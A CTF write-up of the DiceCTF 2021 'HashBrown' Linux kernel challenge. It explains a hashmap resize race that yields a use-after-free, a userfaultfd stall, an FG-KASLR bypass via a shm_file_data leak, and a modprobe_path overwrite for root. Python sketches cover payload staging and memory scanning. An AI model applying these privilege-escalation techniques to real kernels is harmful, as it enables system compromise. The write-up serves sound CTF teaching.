Sunday, February 7, 2021

DiceCTF 2021 HashBrown Writeup: From Kernel Module Hashmap Resize Race Condition to FG-KASLR Bypass

This was the first time DiceCTF has been hosted (by DiceGang), and overall, I think it was quite a successful experience, and the CTF had a high level of difficulty. I wrote a single challenge called HashBrown, which had 7 solves total. I thought I would make a short writeup to summarize the intended path (which most solvers took).


The following is the challenge description.

The kernel was version 5.11, with SMEP, KPTI, and SMAP on. SMEP and KPTI aren't really big deals, but SMAP can make the process more painful.

Setting CONFIG_SLAB causes the kernel to not use the default SLUB allocator (which keeps the freelist linked list metadata on the kernel heap); instead it uses the older SLAB allocator, which doesn't keep metadata on the heap (but rather in a slab manager that stores freed indices with the kmem_bufctl_t field). SLAB_FREELIST_RANDOM applies to both the SLAB and SLUB allocators, and is usually set in the kernels used in common distros (such as Ubuntu). I've run into that feature multiple times while writing kernel exploits: instead of having a nice linear heap that provides allocations in a deterministic order, the freelist order is randomized whenever new pages are initialized. Opening the module in Ghidra/Binja/IDA also clearly reveals that usercopy is hardened.

The most important addition to this kernel challenge is FG-KASLR (I was inspired by hxp CTF's kernel ROP challenge, which had FG-KASLR), a non-mainline kernel security feature that provides extra randomization on top of KASLR. Usually, even with KASLR, you can rebase the entire kernel image from a single leak, since every symbol sits at a fixed offset from the base. FG-KASLR adds an extra layer of protection (while also adding a second to the boot time) by compiling functions into their own sections and shuffling those sections during boot. Offsets of leaked function pointers are therefore no longer deterministic, but FG-KASLR only applies to functions that satisfy the following criteria: the function is written in C and is not in one of a few special sections. Pointers to kernel data or some of the earlier parts of kernel code (and I think even the KPTI trampoline that is useful in exploitation) remain at a constant offset from kernel base.

Now, let's take a look into the provided source code (players seem to have more fun with pwn when there is less reversing, so I released it 2 hours into the CTF):

To summarize the codebase, it is basically a hashmap in a driver that can hold a maximum of 0x400 entries with a maximum array size of 0x200. The resize threshold is generally held at 0.75 and the hash function is copied from the JDK codebase before version 8. The overall code is also quite safe: double frees, null dereferences, etc. are all checked throughout, and the linked list operations are also safe when collisions occur in the hashmap buckets. Size and error checks are also performed, and kzalloc() is used to zero out newly allocated regions (to prevent leaks and such). However, having two mutex locks, one for resize and one for all other hashmap operations, is quite strange, so perhaps it is a good idea to take a closer look at the resize function.
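As a rough illustration of the hashing scheme described above, here is a small Python sketch of the supplemental hash used by java.util.HashMap before JDK 8, together with the usual power-of-two bucket index and the entry counts at which a 0.75 threshold would be hit. The initial array size of 0x10 and the helper names are assumptions made for this example; the module's actual constants and trigger condition should be checked against the source.

```python
MASK32 = 0xFFFFFFFF  # emulate Java's 32-bit int arithmetic


def jdk7_hash(h: int) -> int:
    """Supplemental hash from pre-JDK 8 java.util.HashMap (unsigned shifts)."""
    h &= MASK32
    h ^= (h >> 20) ^ (h >> 12)
    return (h ^ (h >> 7) ^ (h >> 4)) & MASK32


def bucket_index(key: int, size: int) -> int:
    """Bucket slot for a key; size is assumed to be a power of two."""
    return jdk7_hash(key) & (size - 1)


def resize_points(initial_size: int, max_size: int, load_factor: float = 0.75):
    """List (array size, entry count at which the threshold is reached)."""
    points = []
    size = initial_size
    while size < max_size:
        points.append((size, int(size * load_factor)))
        size *= 2
    return points
```

With the assumed starting size, resize_points(0x10, 0x200) gives the number of entries to add before each doubling, which is handy when planning how many resize operations are available for the race.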

When resize is triggered, a new hashmap with an array twice as large as the old one is initialized, but the global hashmap struct does not have its bucket field replaced yet. In order to not corrupt the linked list in the previous hashmap or lose hash entries, the module has to allocate new hash entries and copy over the data (including the value pointer of each key value pair), and then place them in the newly allocated bucket array accordingly (debugging this structure can be somewhat painful, so perhaps writing a gdb python handler can help). If the new request from the user is also valid, resize proceeds to copy its data in from userland. Then, all the old hash_entries are freed (but not the values, as that wouldn't make sense) and the old bucket array is freed, before the global hashmap has its bucket array replaced.

While the resize function does sound safe, let us go back to the point about the 2 mutexes. Notice how a race condition can be created here? If we can get the hashmap resize to trigger and have it copy over values while also deleting a value (that is already copied over) from the current buckets, we can create a UAF scenario! If one mutex were used instead, or the bucket array were replaced immediately in resize, this would not be an issue. I was hoping this would make for a more interesting CTF challenge bug, rather than a standard obvious heap note UAF or overflow by X scenario.
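To make the interleaving concrete, here is a toy userspace model in Python. It is not the module's code: the heap is a dictionary of fake addresses, the hashmap is flattened to a key to value-pointer mapping, and the during_user_copy hook stands in for the window in which resize has already copied the value pointers but has not yet published the new bucket array. All class and function names are made up for this sketch.

```python
class ToyHeap:
    """Tracks which fake allocations are live so stale pointers can be spotted."""

    def __init__(self):
        self.live = {}
        self.next_addr = 0x1000

    def alloc(self, data):
        addr = self.next_addr
        self.next_addr += 0x20
        self.live[addr] = data
        return addr

    def free(self, addr):
        del self.live[addr]

    def is_live(self, addr):
        return addr in self.live


class ToyMap:
    """Key -> value pointer table; hashing and collision chains are omitted."""

    def __init__(self, heap):
        self.heap = heap
        self.buckets = {}

    def add(self, key, data):
        self.buckets[key] = self.heap.alloc(data)

    def delete(self, key):
        # Models the path guarded by the "operations" mutex, which resize
        # does not take, so it may run in the middle of a resize.
        self.heap.free(self.buckets.pop(key))

    def resize(self, during_user_copy=None):
        new_buckets = dict(self.buckets)  # value pointers are copied here
        if during_user_copy is not None:
            during_user_copy()            # resize is stalled on the user copy
        self.buckets = new_buckets        # the new table is published last


def demo_race():
    heap = ToyHeap()
    m = ToyMap(heap)
    m.add(1, b"A")
    m.add(2, b"B")
    # While resize is stalled, another thread deletes an already-copied key.
    m.resize(during_user_copy=lambda: m.delete(1))
    stale_ptr = m.buckets[1]
    return 1 in m.buckets, heap.is_live(stale_ptr)
```

demo_race() reports that key 1 is still reachable through the map even though its value is no longer a live allocation, which is the dangling pointer the rest of the exploit builds on.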

Now that we know the bug, we can come up with an exploitation plan. The first thing we need to do is to create a stable race scenario; otherwise your success rate will be quite low and you will run out of resize operations really quickly. This is quite easy, as an add request made when the threshold limit is hit causes the userland copy for the new entry to be handled inside resize(). We can use the classic userfaultfd page fault technique to hang kernel threads on the userland copy.

On a side note, allowing unprivileged users to use userfaultfd has been the default for a very long time, but it was actually disabled in the 5.11 release candidate codebase. I had to make a one-line patch in the kernel to revert it to the traditional behavior, but did not make note of that in the description: it is trivially easy to check that setting at runtime, explicitly changing the setting in the init script would have spoiled the challenge, and building the kernel with FG-KASLR on other versions was a mess.

Since the value allocations are capped at 0xb0, there is a limited range of useful kernel structures we can use to obtain leaks. A potential go-to would be seq_operations, but it only holds 4 function pointers that are all affected by FG-KASLR. I used shm_file_data, which contains pointers to kernel data. To leak this, we allocate just enough entries to reach the first threshold limit, and then trigger a resize. Once the resize function finishes copying over all the old hash_entries (including the value pointers), we use the uffd technique to hang it, delete a value in another thread, and use shmat to trigger an allocation of shm_file_data. After the resize, we can still read through that stale value pointer, which lets us recover the kernel base.
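The rebasing step is plain arithmetic, sketched below in Python. The offsets are placeholders invented for this example, not values from the challenge kernel; the real ones have to be read from the challenge's vmlinux. The sanity check assumes the usual 2 MiB alignment of the x86_64 kernel base.

```python
KERNEL_ALIGN = 0x200000  # assumption: x86_64 kernel base is 2 MiB aligned


def kernel_base_from_leak(leaked_ptr: int, data_offset: int) -> int:
    """Recover the kernel base from a leaked pointer into kernel data.

    data_offset is the symbol's fixed distance from the base, which stays
    constant under FG-KASLR because only function sections are shuffled.
    """
    base = leaked_ptr - data_offset
    if base % KERNEL_ALIGN != 0:
        raise ValueError("leak does not match the expected data symbol")
    return base


def rebase(base: int, symbol_offset: int) -> int:
    """Address of another non-shuffled symbol, e.g. a writable kernel string."""
    return base + symbol_offset
```

For instance, with a made-up leak of 0xffffffff9b234560 and a made-up offset of 0x1234560, kernel_base_from_leak returns 0xffffffff9a000000, and any other data symbol can then be located with rebase.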

In order to obtain arb write, we can follow a plan similar to the one used for the leak. However, as SMAP is enabled, our options for gaining arb exec are quite limited. One nice technique to bypass SMAP is to overwrite some of the writable strings the kernel uses in conjunction with usermode helper functions; modprobe_path is probably the most famous one, but many others also exist. We should use the race condition to UAF a kmalloc-32 chunk to eventually overwrite the value pointer of a hash_entry that is allocated later. It is important to note that all the hash_entries in the current global bucket array are freed as well, so the UAF'd chunk will not be the first chunk returned; you can easily check when you have control over a hash_entry by repeatedly using get_value. I noticed that the order in which the freelist returned chunks was somewhat deterministic, even though I recall this order being scrambled in a previous kernel challenge; please let me know if you can clarify this part for me, but I believe it is because a new page is not needed (and hence, shuffling doesn't occur).
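For readers unfamiliar with the modprobe_path trick, here is a hedged Python sketch of the userland side only: it stages a helper script and a file with an unrecognized magic number. Once modprobe_path has been overwritten with the helper's path, executing the second file makes the kernel run the helper as root while it looks for a matching binary format handler. The file names, the helper command, and the 256-byte length limit (KMOD_PATH_LEN) are assumptions of this example; the kernel write itself is not shown.

```python
import os
import tempfile

KMOD_PATH_LEN = 256  # assumption: size of the kernel's modprobe_path buffer


def stage_modprobe_payload(workdir: str, helper_cmd: str):
    """Create the helper script and the bogus-format trigger file."""
    helper = os.path.join(workdir, "helper.sh")
    trigger = os.path.join(workdir, "trigger")
    with open(helper, "w") as f:
        f.write("#!/bin/sh\n" + helper_cmd + "\n")
    os.chmod(helper, 0o755)
    with open(trigger, "wb") as f:
        f.write(b"\xff\xff\xff\xff")  # no binfmt handler matches this magic
    os.chmod(trigger, 0o755)
    return helper, trigger


def modprobe_path_bytes(helper: str) -> bytes:
    """NUL-terminated string to place over modprobe_path with the arb write."""
    payload = helper.encode() + b"\x00"
    if len(payload) > KMOD_PATH_LEN:
        raise ValueError("helper path too long for modprobe_path")
    return payload


def stage_in_tempdir(helper_cmd: str):
    """Convenience wrapper that stages everything in a fresh temp directory."""
    return stage_modprobe_payload(tempfile.mkdtemp(), helper_cmd)
```

A typical helper command in a CTF setting would copy the flag somewhere readable; after the overwrite, running the trigger file (which fails with an exec format error) is what causes the helper to be invoked.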

Here is my final exploit and the result of running the exploit:

Another interesting solution I saw came from LevitatingLion of the RedRocket CTF team. The exploit used a nice arb read/write primitive to scan memory starting at 0xffffffffc0000000, looking for kernel data and the modprobe string (like a pseudo-egghunt) to bypass FG-KASLR.
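The egghunt idea can be sketched in a few lines of Python. This is not LevitatingLion's code: read_at is a hypothetical callback wrapping whatever arbitrary read primitive is available, assumed to return exactly the requested number of bytes, or None for an unreadable range. fake_reader exists only so that the scan can be tried out against a byte buffer.

```python
def egghunt(read_at, start, end, needle, chunk=0x1000):
    """Scan [start, end) in chunks and return the address of needle, or None."""
    overlap = len(needle) - 1
    tail = b""  # bytes carried over so matches straddling two chunks are found
    addr = start
    while addr < end:
        data = read_at(addr, min(chunk, end - addr))
        if data is None:
            tail = b""  # unreadable range: nothing can straddle into it
        else:
            window = tail + data
            pos = window.find(needle)
            if pos != -1:
                return addr - len(tail) + pos
            tail = window[-overlap:] if overlap else b""
        addr += chunk
    return None


def fake_reader(base, memory):
    """Build a read_at callback over an in-process buffer (testing aid only)."""
    def read_at(addr, size):
        off = addr - base
        if off < 0 or off + size > len(memory):
            return None
        return bytes(memory[off:off + size])
    return read_at
```

Searching for b"/sbin/modprobe", the default modprobe path string, from the start address mentioned above yields the location of the string without relying on any function offsets.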

Feel free to let me know if any of my explanations were wrong or if you have any questions. Congrats to Pernicious from RPISEC for taking first blood and D3v17 for doing last minute testing for me! Thanks once again to all those who participated in DiceCTF and fellow organizers (especially the infra people asphyxia and ginkoid), and make sure to check out the other writeups, such as kmh's extreme pyjail challenge TI1337 Plus CE, defund's crypto challs, and NotDeGhost's Chromium sandbox escape challenge Adult CSP.